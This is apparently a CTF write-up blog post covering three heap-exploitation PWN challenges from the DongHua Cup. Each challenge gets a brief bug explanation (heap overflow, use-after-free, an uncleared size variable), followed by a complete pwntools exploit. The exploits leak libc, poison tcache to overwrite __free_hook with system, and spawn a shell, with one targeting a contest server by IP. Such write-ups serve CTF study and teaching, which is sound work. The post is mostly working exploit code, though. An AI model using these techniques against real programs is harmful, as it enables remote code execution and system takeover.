东华杯部分PWN
LOLOLO Lv3

Cpp1

edit的时候没有进行size的大小判定,存在堆溢出。利用堆溢出进行overlapping来泄露libc,之后简单地向__free_hook写入system,最后释放掉binsh的堆块获取shell

exp:

#coding:utf-8
from pwn import *
from LibcSearcher import *
import time, sys, base64

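# pwntools settings for the target: a 64-bit Linux binary.
context.os = 'linux'
context.arch = 'amd64'
# context.arch = 'i386'
context.log_level = 'debug'

# Connection mode:
#   1 -> spawn `filename` as a local process
#   2 -> the contest's remote instance (address/port as given by the challenge)
#   3 -> a local listener on 127.0.0.1:12345
debug = 1
filename = 'pwn1'

if debug == 1:
    p = process(filename)
elif debug == 2:
    p = remote('47.104.143.202', 43359)
elif debug == 3:
    p = remote('127.0.0.1', 12345)
else:
    # Without this branch an unrecognised mode leaves `p` unbound and the
    # first helper call dies with a confusing NameError far from the cause.
    raise ValueError('unknown debug mode: %r' % (debug,))

elf = ELF('./pwn1')
# Host-specific libc path: every symbol-based offset computed later in the
# script is only valid for the libc build the target actually loads.
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')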

def cmd(index):
    """Answer the main-menu prompt ('>>') with option number *index*."""
    choice = str(index)
    p.sendlineafter('>>', choice)

def add(index, size):
    """Menu option 1: allocate slot *index* with *size* bytes.

    The program asks for the index ('I:>>') and then the size ('S:>>');
    both are sent as decimal text.
    """
    cmd(1)
    for prompt, value in (('I:>>', index), ('S:>>', size)):
        p.sendlineafter(prompt, str(value))

def edit(index, content):
    """Menu option 2: write *content* into slot *index*.

    *content* is handed to the tube unchanged (bytes or str), so the
    caller controls its exact length and encoding.
    """
    cmd(2)
    slot = str(index)
    p.sendlineafter('I:>>', slot)
    p.sendlineafter('V:>>', content)

def show(index):
    """Menu option 3: ask the program to print slot *index*.

    Nothing is read back here; the caller consumes the output from `p`.
    """
    cmd(3)
    slot = str(index)
    p.sendlineafter('I:>>', slot)

def free(index):
    """Menu option 4: release slot *index*."""
    cmd(4)
    slot = str(index)
    p.sendlineafter('I:>>', slot)

#print(hex(libc.sym['_IO_2_1_stdin_']))

# Interaction sequence for the Cpp1 challenge described above. This is one
# strictly ordered conversation with the tube `p`: each call depends on the
# allocator state left behind by the previous ones, so nothing here can be
# reordered or skipped. Runs at import time, like the rest of the script.

add(0,0x30)
add(1,0x90)
add(2,0x90)
add(3,0x90)
add(4,0x90)
add(5,0x90)
add(6,0x90)

add(7,0x50)

add(8,0x90)


payload = b'a'*0x30 + p64(0)+p64(0x421)
edit(0,payload)
# gdb.attach(p)

free(1)
# gdb.attach(p)
add(9,0x80)

show(9)
p.recvuntil('\n')
# malloc_hook_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8,b'\x00')) - 1104 -0x10
# Leak parsing: the raw constants (1104, 0x10) and the offsets below are
# presumably tied to the libc build loaded via ELF(...) above — a different
# build breaks every address derived from this line.
malloc_hook_addr=u64(p.recvline(keepends=False).ljust(8,b'\x00'))-1104-0x10
log.success('malloc_hook_addr: ' + hex(malloc_hook_addr))


libc_base = malloc_hook_addr - libc.sym['__malloc_hook']
# `fun` is a bare hard-coded offset with no symbol name; it is printed here
# and never used again.
fun=libc_base+0x1ebce0
print(hex(fun))



system_addr = libc_base + libc.sym['system']
# `one_gadget` is computed and logged only; the remainder of the script
# uses system_addr instead.
one = [0xe6c7e,0xe6c81,0xe6c84]
one_gadget = libc_base + one[2]
free_hook=libc_base +libc.sym['__free_hook']

log.success('system_addr: ' + hex(system_addr))
log.success('one_gadget: ' + hex(one_gadget))
add(10,0x80)
free(10)
#free(6)
free(9)
edit(0,b'a'*0x38+p64(0x91)+p64(free_hook))
add(11,0x80)
edit(11,'/bin/sh\x00')
add(12,0x80)
edit(12,p64(system_addr))
# Debugger hook left in: runs regardless of the `debug` mode chosen above.
gdb.attach(p)
#add(13,0x20)
free(11)
#gdb.attach(p)
p.interactive()

gcc_2

cpp1的简单升级版,堆溢出变为uaf。利用uaf将fd指向tcache管理结构,申请到tcache结构,将对应的tcache的堆块对应的counts填充为7,然后释放掉该堆块,获得libc地址,之后将堆块申请到free_hook写入system释放binsh堆块即可

#coding:utf-8
from pwn import *
from LibcSearcher import *
import time, sys, base64

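# pwntools settings for the target: a 64-bit Linux binary.
context.os = 'linux'
context.arch = 'amd64'
# context.arch = 'i386'
context.log_level = 'debug'

# Connection mode:
#   1 -> spawn `filename` as a local process
#   2 -> the contest's remote instance (address/port as given by the challenge)
#   3 -> a local listener on 127.0.0.1:12345
debug = 2
filename = 'pwn2'

if debug == 1:
    p = process(filename)
elif debug == 2:
    p = remote('47.104.143.202', 15348)
elif debug == 3:
    p = remote('127.0.0.1', 12345)
else:
    # Without this branch an unrecognised mode leaves `p` unbound and the
    # first helper call dies with a confusing NameError far from the cause.
    raise ValueError('unknown debug mode: %r' % (debug,))

elf = ELF('./pwn2')
# libc = ELF.libc
# The libc shipped with the challenge; symbol offsets computed later in the
# script are only valid for this exact build.
libc = ELF('libc-2.31.so')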

def cmd(index):
    """Select main-menu entry *index* at the '>>' prompt."""
    p.sendlineafter('>>', '%d' % index if isinstance(index, int) else str(index))

def add(index, size):
    """Menu option 1: allocate slot *index* with *size* bytes.

    Answers the 'I:>>' (index) and 'S:>>' (size) prompts in that order.
    """
    cmd(1)
    slot, length = str(index), str(size)
    p.sendlineafter('I:>>', slot)
    p.sendlineafter('S:>>', length)

def edit(index, content):
    """Menu option 2: store *content* in slot *index*.

    *content* goes to the tube as-is; no length or encoding conversion.
    """
    cmd(2)
    for prompt, value in (('I:>>', str(index)), ('V:>>', content)):
        p.sendlineafter(prompt, value)

def show(index):
    """Menu option 3: have the program print slot *index*.

    The printed data is left on the tube for the caller to read.
    """
    cmd(3)
    p.sendlineafter('I:>>', str(index))

def free(index):
    """Menu option 4: release slot *index*."""
    cmd(4)
    slot = str(index)
    p.sendlineafter('I:>>', slot)



# Interaction sequence for the gcc_2 challenge described above. One strictly
# ordered conversation with the tube `p`; every call depends on the allocator
# state produced by the previous ones, so the order is the whole logic.

# Offset of the arena relative to the libc base, derived from the
# __malloc_hook symbol of the libc loaded above.
main_arena_offset = libc.symbols["__malloc_hook"] + 0x10
add(0,0x67)
add(1,0x67)
add(2,0x67)
edit(0,'a'*0x10)

free(0)
free(1)

show(1)
p.recvuntil('\n')
# The 0x12ec0 constant is a hard-coded distance; presumably specific to this
# binary/libc combination — verify before reusing.
heap_base = u64(p.recvline(keepends=False).ljust(8,b'\x00')) - 0x12ec0
log.success('heap_base: ' + hex(heap_base))
edit(1,p64(heap_base+0x10))
add(3,0x67)
#edit(3,'/bin/sh\x00')
add(4,0x67) # obtains the tcache management chunk
#free(4)
edit(4,p64(0)*9+p64(0x0007000000000000))
free(4)
show(4)
p.recvuntil('\n')
base = u64(p.recvline(keepends=False).ljust(8,b'\x00'))-96-main_arena_offset
print(hex(base))
free_hook=base +libc.sym['__free_hook']
# NOTE: `sys` shadows the `sys` module imported at the top of the file.
sys=base+libc.sym['system']
# `malloc_hook` is computed but never used afterwards.
malloc_hook=base +libc.sym['__malloc_hook']
edit(4,p64(0x0000000000000000)*2)
free(1)
free(2)
edit(2,p64(free_hook))
add(5,0x67)
edit(5,'/bin/sh\x00')
add(6,0x67)
edit(6,p64(sys))
# Debugger hook left in: runs regardless of the `debug` mode chosen above.
gdb.attach(p)
free(5)

bg3

个人觉得这是三题里面最简单的,在del里面删除后,没有对存放size的全局变量清零,导致size叠加,即会造成人为堆溢出。然后大致同第一题

#coding:utf-8
from pwn import *
from LibcSearcher import *
import time, sys, base64

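# pwntools settings for the target: a 64-bit Linux binary.
context.os = 'linux'
context.arch = 'amd64'
# context.arch = 'i386'
context.log_level = 'debug'

# Connection mode:
#   1 -> spawn `filename` as a local process
#   2 -> the contest's remote instance (address/port as given by the challenge)
#   3 -> a local listener on 127.0.0.1:12345
debug = 1
filename = 'pwn3'

if debug == 1:
    p = process(filename)
elif debug == 2:
    p = remote('47.104.143.202', 25997)
elif debug == 3:
    p = remote('127.0.0.1', 12345)
else:
    # Without this branch an unrecognised mode leaves `p` unbound and the
    # first helper call dies with a confusing NameError far from the cause.
    raise ValueError('unknown debug mode: %r' % (debug,))

elf = ELF('./pwn3')
# libc = ELF.libc
# The libc shipped with the challenge; symbol offsets computed later in the
# script are only valid for this exact build.
libc = ELF('libc-2.31.so')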

def cmd(index):
    """Pick main-menu entry *index* at the 'Select:' prompt."""
    choice = str(index)
    p.sendlineafter('Select:', choice)

def add(index, size):
    """Menu option 1: allocate slot *index* with *size* bytes.

    Answers the 'Index:' prompt, then 'PayloadLength:'.
    """
    cmd(1)
    for prompt, value in (('Index:', index), ('PayloadLength:', size)):
        p.sendlineafter(prompt, str(value))

def edit(index, content):
    """Menu option 2: write *content* into slot *index*.

    *content* is sent unchanged at the 'BugInfo:' prompt.
    """
    cmd(2)
    slot = str(index)
    p.sendlineafter('Index:', slot)
    p.sendlineafter('BugInfo:', content)

def show(index):
    """Menu option 3: have the program print slot *index*.

    Output stays on the tube for the caller to consume.
    """
    cmd(3)
    slot = str(index)
    p.sendlineafter('Index:', slot)

def free(index):
    """Menu option 4: release slot *index*."""
    cmd(4)
    p.sendlineafter('Index:', str(index))

# Interaction sequence for the bg3 challenge described above. One strictly
# ordered conversation with the tube `p`; each call depends on the allocator
# state produced by the previous ones, so statements must not be reordered.
add(0,0x20)
add(1,0x410)
add(2,0x20)
#gdb.attach(p)
edit(0,'a'*0x10)
free(0)
free(1)
add(1,0x410)
show(1)
#free(0)
# Leak parsing: scans up to the first 0x7f byte and takes the six bytes
# before it; the -96 adjustment is a hard-coded constant for this libc.
main_arena_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8,b'\x00')) - 96
log.success('main_arena_addr: ' + hex(main_arena_addr))
# Arena offset derived from the __malloc_hook symbol of the libc loaded above.
main_arena_offset = libc.symbols["__malloc_hook"] + 0x10
base =main_arena_addr-main_arena_offset
print(hex(base))
free_hook=base+libc.sym['__free_hook']
# NOTE: `sys` shadows the `sys` module imported at the top of the file.
sys=base + libc.sym['system']
free(1)
#add(3,0x7fffffff)
add(1,0x10)
#edit(1,'b'*0x30)
add(5,0x3f0)
add(6,0x3f0)
free(6)
free(5)
edit(1,p64(0)*3+p64(0x401)+p64(free_hook))
add(7,0x3f0)
edit(7,'/bin/sh\x00')
add(8,0x3f0)
edit(8,p64(sys))
free(7)
p.interactive()
  • 本文标题:东华杯部分PWN
  • 本文作者:LOLOLO
  • 创建时间:2021-11-01 08:22:39
  • 本文链接:https://lololo-pwn.github.io/2021/11/01/东华杯部分PWN/
  • 版权声明:本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!